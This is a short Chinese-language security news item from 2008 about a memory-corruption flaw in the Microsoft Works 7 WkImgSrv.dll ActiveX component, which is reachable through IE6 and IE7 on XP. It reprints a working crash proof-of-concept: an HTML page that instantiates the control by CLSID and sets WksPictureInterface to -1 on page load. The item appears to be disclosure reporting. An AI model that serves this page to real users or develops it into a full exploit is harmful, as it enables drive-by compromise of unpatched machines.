ITBear旗下自媒體矩陣:

又一個IE 0day漏洞 - 問題出自Microsoft Works

   時間:2008-04-18 07:45:11 來源:知道安全作者:知道安全編輯:星輝 發(fā)表評論無障礙通道
近幾天網(wǎng)絡(luò)上流傳著一個傳說為IE0DAY的POC代碼,在XP系統(tǒng)環(huán)境下通殺了IE6和IE7,其它系統(tǒng)并未經(jīng)過測試。其實(shí)這個漏洞并不是存在于IE,而是Microsoft Works的組件被挖掘出漏洞,部分的XP預(yù)裝了Microsoft Works,所以就出現(xiàn)了過全補(bǔ)丁系統(tǒng)的漏洞(如華碩易PC 就預(yù)裝了Microsoft Works)。

影響的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0)

以下為crash POC

<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language=”JavaScript”>
    function payload() {
             var num = -1;
             obj.WksPictureInterface = num;
             }
   </script>
</head>
<body onload=”JavaScript: return payload();”>
<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
</object>
</body>
</html>

舉報 0 收藏 0 打賞 0評論 0
 
 
更多>同類資訊
全站最新
熱門內(nèi)容
網(wǎng)站首頁  |  關(guān)于我們  |  聯(lián)系方式  |  版權(quán)聲明  |  網(wǎng)站留言  |  RSS訂閱  |  違規(guī)舉報  |  開放轉(zhuǎn)載  |  滾動資訊  |  English Version